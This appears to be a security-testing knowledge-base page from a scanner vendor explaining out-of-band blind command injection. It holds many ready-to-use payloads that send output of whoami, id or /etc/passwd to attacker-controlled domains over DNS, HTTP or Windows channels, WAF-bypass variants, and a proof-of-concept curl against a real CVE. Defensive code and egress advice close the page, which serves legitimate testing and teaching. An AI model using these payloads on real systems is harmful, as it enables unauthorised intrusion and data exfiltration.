Exfiltrates command output via DNS lookups, HTTP requests, or SMTP callbacks when direct response output is unavailable.
TL;DR
; nslookup $(whoami).OAST_DOMAIN encodes command output in the DNS subdomainoast.pro/oast.live (public)Out-of-band (OOB) command injection is the technique of confirming — and exfiltrating from — blind command injection by triggering a network connection from the target server to an attacker-controlled listener. The injected command does not produce output in the HTTP response; instead, it initiates an outbound DNS lookup, HTTP request, or other network protocol interaction that the attacker observes on their infrastructure.
OOB is the most reliable confirmation method for blind injection. It is immune to CDN response buffering (which defeats time-based detection), server load variation, and network jitter. It provides identity evidence — the running user encoded in the DNS subdomain — rather than just a binary yes/no. And because DNS resolution is permitted through most enterprise firewalls even when HTTP is filtered, DNS-based OOB reaches targets that HTTP callbacks cannot.
This page covers the mechanics of OOB exfiltration, the full infrastructure landscape, how BreachVex correlates callbacks to individual probes, and the specific cases where OOB is the only viable detection method. For the foundational blind injection concept, see the Blind page. For time-based confirmation, see the Time-Based page.
The OOB chain has six steps:
whoami) as a subdomain or path parameter.$(whoami) as a subshell, then uses the result as part of the DNS query or URL.DNS-based OOB is the most reliable because DNS port 53 UDP/TCP traverses most enterprise firewalls:
# Basic whoami exfiltration — most common pattern
; nslookup $(whoami).OAST_DOMAIN
; nslookup `id`.OAST_DOMAIN
# curl-based DNS resolution (if nslookup unavailable)
; curl http://$(whoami).OAST_DOMAIN/
# Host command alternative
; host $(whoami).OAST_DOMAIN
# dig alternative
; dig $(whoami).OAST_DOMAIN
# Exfiltrate hostname
; nslookup $(hostname).OAST_DOMAIN
# Exfiltrate whoami + hostname together
; nslookup $(whoami).$(hostname).OAST_DOMAIN
# Windows equivalent (cmd.exe)
& nslookup %OS%.OAST_DOMAIN &
& nslookup %COMPUTERNAME%.OAST_DOMAIN &HTTP callbacks allow larger data payloads (no 63-character DNS label limit):
# Base64-encoded id output via curl
; curl http://OAST_DOMAIN/$(id|base64 -w0)
# wget alternative
; wget -q http://OAST_DOMAIN/?q=$(id|base64 -w0)
# /etc/passwd content (partial — first line)
; curl http://OAST_DOMAIN/$(head -1 /etc/passwd|base64 -w0)
# File enumeration via loop
; for f in $(ls /etc/); do curl -s http://OAST_DOMAIN/?f=$f; done
# With IFS bypass for WAF evasion
$(curl${IFS}http://$(id|base64${IFS}-w0).OAST_DOMAIN/)REM DNS — net use for UNC path triggers DNS+SMB (useful with Responder)
& net use \\$(OAST_DOMAIN)\share &
REM DNS via nslookup
& nslookup %USERNAME%.OAST_DOMAIN &
REM HTTP via certutil (often whitelisted)
& certutil -urlcache -split -f http://OAST_DOMAIN/$(whoami) %TEMP%\oob.txt &
REM PowerShell HTTP callback
& powershell -c "Invoke-WebRequest http://OAST_DOMAIN/?u=$env:USERNAME" &When the target filters spaces in injection payloads:
; nslookup${IFS}$(whoami).OAST_DOMAIN
; curl${IFS}http://OAST_DOMAIN/$(id)
$(curl${IFS}http://$(whoami|base64${IFS}-w0).OAST_DOMAIN/)
%0a nslookup$(IFS)$(whoami).OAST_DOMAINBurp Collaborator is the standard OAST infrastructure for professional penetration tests:
# Burp Collaborator subdomain format:
YOUR-PAYLOAD.YOUR-COLLABORATOR-ID.oastify.comInteractsh (ProjectDiscovery) is the leading open-source OAST solution:
# Install CLI
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
# Start client — auto-registers a unique subdomain
interactsh-client
# Output:
# [INF] Using interactsh server: oast.pro
# [INF] Listing on: abc123xyz.oast.pro
# [DNS] Received DNS interaction for: www-data.abc123xyz.oast.pro from 203.0.113.42Self-hosted deployment (for air-gapped environments):
# Deploy interactsh-server on VPS
interactsh-server --domain your-oast.example.com --token secret-token
# Connect client to self-hosted server
interactsh-client -s your-oast.example.com -token secret-token| Service | Domain | Protocol Support | Notes |
|---|---|---|---|
| Interactsh public | oast.pro, oast.live | DNS, HTTP, SMTP | Free, no auth required |
| Interactsh public | oast.fun, oast.me | DNS, HTTP | Free |
| Interactsh public | oast.online, oast.site | DNS, HTTP | Free |
| Burp Collaborator | oastify.com | DNS, HTTP, SMTP | Requires Burp Suite Pro |
Burp Collaborator vs Interactsh self-hosted: Use Collaborator when the pentest requires an audit trail and professional report artifacts — it integrates with Burp Scanner's findings and timestamps are linked to specific scan requests. Use Interactsh self-hosted when the target environment has egress filtering that blocks known OAST domains (some enterprise WAFs block oastify.com and oast.pro), or when data privacy requires avoiding third-party infrastructure.
In concurrent scans testing multiple parameters simultaneously, multiple OOB payloads fire at the same time. Without per-probe correlation IDs, you cannot determine which parameter caused which callback.
import uuid
def generate_oob_payload(param_name, oast_server):
"""Generate a unique OOB payload for a single parameter probe."""
correlation_id = str(uuid.uuid4())[:8]
oast_domain = f"cmdi-{correlation_id}.{oast_server}"
payload = f"; nslookup $(whoami).{oast_domain}"
return payload, correlation_id, oast_domain
# Usage:
payload, corr_id, domain = generate_oob_payload("host", "oast.pro")
# payload = "; nslookup $(whoami).cmdi-7a3b1f92.oast.pro"
# corr_id = "7a3b1f92"
# domain = "cmdi-7a3b1f92.oast.pro"Expected proof JSON when interaction is received:
{
"technique": "oob_dns",
"payload": "; nslookup $(whoami).cmdi-7a3b1f92.oast.pro",
"oob_interaction": {
"type": "dns",
"subdomain_received": "www-data.cmdi-7a3b1f92.oast.pro",
"exfiltrated_data": "www-data",
"source_ip": "203.0.113.42",
"timestamp": "2026-05-08T14:23:11Z",
"correlation_id": "7a3b1f92"
}
}CVE-2024-3400 — PAN-OS GlobalProtect (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
The exploitation of CVE-2024-3400 by threat actor UTA0218 (Volexity) is one of the most documented real-world uses of OOB injection confirmation in a nation-state campaign. The two-stage attack:
SESSID cookie with path traversal (SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.py) used the GlobalProtect portal to write an arbitrary Python file.Attackers confirmed root-level execution via OOB DNS callbacks before deploying the UPSTYLE Python backdoor. The OOB confirmation was critical because the HTTP response from the portal returned no command output. CISA added this to the KEV catalog on April 12, 2024 — the same day of discovery.
CVE-2024-9463 — Palo Alto Expedition (CVSS 9.9)
The unauthenticated OS command injection in /API/convertCSVtoParquet.php executed commands as root without returning any output in the API response. OOB was the only viable confirmation method. PoC exploitation used:
curl -X POST https://expedition.example.com/API/convertCSVtoParquet.php \
-d "file=x;curl${IFS}http://$(id|base64${IFS}-w0).cmdi-test.oast.pro/"The Interactsh server received an HTTP GET to a path containing the base64-encoded id output, confirming root execution. CISA KEV.
HackerOne — OOB-Based Blind Injection Reports
Multiple public HackerOne reports document OOB-confirmed blind injection. HackerOne #2293731 (Internet Bug Bounty, CVE-2023-6004) used SSH ProxyCommand injection via user-controlled hostnames — the blind injection was confirmed via DNS OOB since the SSH subprocess produced no application-visible output. The technique of using ProxyCommand option injection maps directly to the Argument Injection variant covered in the Argument Injection page.
Register an Interactsh subdomain or configure Burp Collaborator:
interactsh-client
# Note the assigned subdomain: abc123.oast.proInject the DNS probe with a correlation ID:
; nslookup $(whoami).cmdi-test-001.abc123.oast.pro
; curl http://abc123.oast.pro/$(id|base64 -w0)Monitor the Interactsh console for incoming interactions:
[DNS] www-data.cmdi-test-001.abc123.oast.pro from 203.0.113.42The subdomain prefix www-data confirms both execution and the running user.
If DNS is blocked, try HTTP:
; curl http://abc123.oast.pro/probe
; wget -q -O /dev/null http://abc123.oast.pro/probeTest with space-bypass variants when basic payloads fail:
;${IFS}nslookup${IFS}$(whoami).abc123.oast.pro
%0anslookup%20$(whoami).abc123.oast.proFor Windows targets, test DNS via nslookup and UNC paths:
& nslookup %USERNAME%.abc123.oast.pro &Commix OOB mode:
commix --url "http://target.com/ping?host=*" \
--batch --smart --technique=O --level=3 \
--dns-server oast.proBurp Suite Pro active scanner automatically uses Collaborator for OOB detection when "Out-of-band" techniques are enabled in scanner settings. The Collaborator panel shows all interactions correlated to scan items.
BreachVex confirms OOB injection by injecting ; nslookup $(whoami).cmdi-<correlation-id>.<oast-domain> with a unique correlation ID per probe. When the out-of-band interaction is received, the subdomain prefix (the command output) and the correlation ID are extracted and stored as confirmed proof evidence.
OOB injection exploits the same root cause as all command injection variants — user input reaching a shell execution function. The OOB channel is an exploitation technique, not the vulnerability itself. Preventing the injection prevents the OOB callback.
# VULNERABLE — OOB callback fires from this code
import os
def process_domain(domain):
# Attacker injects: ; nslookup $(whoami).attacker.oast.pro
result = os.popen(f"nslookup {domain}").read()
return result
# SAFE — no shell, array form
import subprocess, re
def process_domain_safe(domain):
# Strict allowlist — domain format only
if not re.fullmatch(r'^[a-zA-Z0-9][a-zA-Z0-9\-\.]{1,253}[a-zA-Z0-9]$', domain):
raise ValueError("Invalid domain format")
result = subprocess.run(
["nslookup", domain],
capture_output=True,
text=True,
timeout=10
)
return result.stdoutNetwork-level defense: block outbound DNS and HTTP requests from application servers to the internet. Many OOB detection techniques fail entirely when the server has no direct internet access and all DNS is resolved through an internal server that does not forward to external resolvers. This does not fix the injection vulnerability but defeats OOB confirmation and data exfiltration.
Blocking OOB channels (egress filtering, DNS sinkholes) defeats OOB detection but does not fix the underlying injection. Attackers will switch to time-based blind confirmation or file-write techniques. Egress filtering is a valuable defense-in-depth control but is not a substitute for parameterized execution APIs.
OOB injection is immune to the three main sources of false positives in time-based detection: server load variation, CDN response buffering (which flattens time deltas), and network jitter. An OOB DNS callback also provides identity evidence — the whoami output in the subdomain is definitive proof of execution, not just a binary yes/no. Time-based gives a probability; OOB gives certainty.
OAST (Out-of-band Application Security Testing) servers are infrastructure that receive DNS, HTTP, SMTP, and other protocol interactions triggered by injected payloads. The attacker registers a unique subdomain like cmdi-abc123.oast.pro, injects a payload that causes the target to resolve that subdomain, and monitors the OAST server for incoming lookups. Each interaction is timestamped and correlated to the injecting request.
; nslookup $(whoami).YOUR-ID.oastify.com — the $(whoami) executes first, its output becomes the subdomain prefix. The target server sends a DNS A-record lookup for www-data.YOUR-ID.oastify.com (or root, or whatever user runs the process). The OAST server logs www-data as the subdomain, confirming both injection and the running user identity.
Burp Suite Pro with Collaborator integration is standard for professional pentests — it provides per-test unique subdomains, polling API, DNS/HTTP/SMTP capture, and audit trail. For open-source alternatives, Interactsh (ProjectDiscovery) is self-hostable for air-gapped environments. Free public endpoints: oast.pro, oast.live, oast.fun, oast.me, oast.online, oast.site. Always use unique per-probe subdomains for correlation.
Threat actor UTA0218 (tracked by Volexity) confirmed CVE-2024-3400 exploitation via OOB DNS callbacks during the initial zero-day exploitation phase in April 2024. The OOB technique allowed verification of root-level execution (the SESSID cookie path traversal triggered a Python script executed by a cron job with root privileges) before deploying the UPSTYLE backdoor. This is one of the clearest documented uses of OOB confirmation in a CISA KEV exploit.
DNS OOB may be blocked when: the application server has no outbound DNS resolution (air-gapped or strict firewall), the DNS resolver is configured to block external queries, or egress filtering blocks port 53 UDP/TCP. Alternatives: HTTP OOB via curl or wget (port 80/443, often permitted), SMB callbacks on Windows (UNC paths trigger NTLM auth to attacker's Responder), or ICMP if available. If all outbound is blocked, fall back to time-based or file-write confirmation.
A correlation ID is a unique identifier embedded in each OOB payload's subdomain: ; nslookup $(whoami).cmdi-7a3b1f92.oast.pro. The 8-character UUID segment cmdi-7a3b1f92 links the received DNS callback to the specific request that triggered it. Without correlation IDs, concurrent probes to multiple parameters create ambiguity — you can't tell which parameter caused the callback.
Yes, but the DNS protocol's label length limit (63 characters per label, 253 total) constrains single-lookup exfiltration. For small strings like whoami output (typically 4-15 chars), the subdomain approach works directly. For larger data, use HTTP OOB with base64 encoding: ; curl http://OAST_DOMAIN/$(cat /etc/passwd | base64 -w0). For full file enumeration, use a loop: ; for f in $(ls /etc/); do host $f.OAST_DOMAIN; done.
Burp Collaborator provides: (1) guaranteed unique subdomains per test with automatic cleanup, (2) polling API integration in Burp Scanner that correlates callbacks to specific scan items, (3) SMTP interaction capture in addition to DNS/HTTP, (4) no public exposure of interaction data (private server), and (5) automatic inclusion in reports. Free OAST endpoints (oast.live) work fine for manual testing but lack the audit trail needed for professional reports.
Non-interactive shells (sh, dash, restricted bash) still support command substitution $() and nslookup. The curl/wget approach works unless those binaries are missing. In minimal containers where neither is present, try: /bin/sh -c 'host $(id).OAST_DOMAIN', or encode data as hex and use ping ICMP data fields. Alpine Linux containers often lack nslookup but have wget.
BreachVex generates a unique correlation ID per probe and embeds it in the OAST subdomain (e.g. cmdi-<correlation-id>.<oast-domain>). When a DNS callback arrives, the subdomain prefix maps back to the originating request, and the exfiltrated command output is recorded as proof. This prevents cross-probe false positives in concurrent multi-parameter scans.